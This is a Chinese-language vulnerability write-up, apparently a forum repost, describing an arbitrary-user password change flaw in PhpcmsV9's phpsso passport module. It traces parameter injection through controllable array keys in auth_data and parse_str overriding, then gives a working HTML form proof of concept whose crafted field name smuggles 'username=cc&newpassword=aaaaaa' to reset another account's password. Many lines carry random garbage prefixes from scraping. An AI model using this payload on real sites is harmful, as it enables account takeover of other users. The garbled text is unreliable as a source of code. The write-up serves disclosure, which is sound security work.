PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：


8 a- ^9 b7 e3 {' J0 o' [" ~parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
3 z" Y" ]" q! t6 h/ ]: }- W5 D
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
+ \/ t1 i7 y6 m, E& Y
* P* r3 B( o- C; O" Q: P  p" p我把它留给了你们。
2 E7 p& H* o7 ^. S7 ~. R; [不知道你们发现了它没有。
7 O' e4 [/ z2 m9 j. E
我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。
$ x& R" l. N3 p* S) T, M
, |7 u1 k7 s# J4 v, j; G' Y所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。
$ d* p: M4 t6 Q0 X( \& q4 a( ]
  ^% f9 q5 j# G# l3 T: @也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。

3 R! ]+ p" G5 ]" N% K8 N8 w9 m要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
/ Q: I& B$ `5 ]

其实我们有这样的机会，看看代码，如下：


public function auth_data($data) {
                $s = $sep = '';
                foreach($data as $k => $v) {
                        if(is_array($v)) {
1 M8 p/ Z. P% w+ O$ {                                $s2 = $sep2 = '';
6 g# i. ~! |2 u. O8 T  n6 \: ^' Z                                foreach($v as $k2 => $v2) {
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
$ q. Q+ @1 v" @8 T* N( D% ^                                        $sep2 = '&';
                                }
                                $s .= $sep.$s2;
; L3 ]+ P5 j9 N( A                        } else {
' x+ l$ L# k2 ~6 K' G                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
( G( e* ~% a6 b/ I; ?2 J& y2 m                        }
                        $sep = '&';
  c) w. z4 [. P0 P& F                }
! c3 n* h! a$ {# C
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
                return $auth_s;
; w4 ^& u3 x2 G2 L: Z5 @7 D2 N# m        }
; J" ], n& \- M$ S0 |# p
可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。
# ~* v/ b, j2 ^0 M2 Y5 \
举个例子

$a[aaa=a&bbb] = 'a';

% G* N" ~  C- b1 f( p+ W0 S会变成aaa=a&bbb=a
% r: ^& |: ?. z
. V  x2 c. V7 m/ @1 I8 J- R明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

这个时候，我们可以再去看一个函数。

就在这个文件内：
' @4 Y% R+ Y& D1 x

public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
  n) J" _( L. R/ B9 [) w, t5 t                        return -4;
                }
  E) _( ^& a$ I4 |, c  y                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }
9 s9 ]8 A1 ^8 y6 x
$ q0 F( J1 X/ }" ~" ^! i8 r这是向通行证发了这样一个请求。
+ `/ i; A2 R* e% B9 ~& a
5 }1 P  W' X. T& f3 N) Q6 F我们再跟到通信证代码里去看看，就会有所发现。
2 i! p( }0 C7 M4 u
  _3 F  S5 t1 l" E' I& p( x' R
7 A2 {* j0 ]" o8 S5 X% Tpublic function edit() {
  b# C/ A* Y/ V3 H3 D//能省就省，太长了不是吗？
7 D% g4 l6 j3 {7 w& U" ]. ^
if($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
6 B; Y( o5 s0 g/ `0 H                                $res = $this->db->update($data, array('username'=>$this->username));
; ^6 o2 {" c" l+ U1 E, c/ V, f                        } else {
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
                                $res = $this->db->update($data, array('uid'=>$this->uid));
' N, D5 s' S; w- J                        }

好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
/ b7 z0 D7 `) `+ e* X, D0 z1 ^, Y
3 S! N  j3 O$ z+ A+ Y. H% ^& q很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。

我当然找到了：
phpcms9/phpcms/modules/member/index.php
9 V3 x: [6 v/ e% X4 i
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);

然后就没有然后了。
: z! q1 f% O4 T* |4 k1 X* L
* D" C& @9 c1 M( Z<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
  w$ d& x% h% k! \( g1 `7 U                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
1 x  p# C- ?. j                                                <th width="80">邮箱：</th>        
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
                                        </tr>
                                        <tr>
                                                <th width="80">原密码：</th>        
) z; T! R6 I6 S2 ~% {# P5 P, M                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
$ F* h) C5 w% ?! h7 S  E( w                                        </tr>
                                        <tr>
" A! K! X/ l1 m: A                                                <th>新密码：</th>
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
                                        </tr>
                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
1 g) p( I2 N7 E4 B; \" X) ?" d2 l                                </table>
0 G. Z! ?% }0 s  x/ h
                               
; |8 N( P! V7 B( w  {  b+ X                        </form>
1 m; F, U: `. \) T  V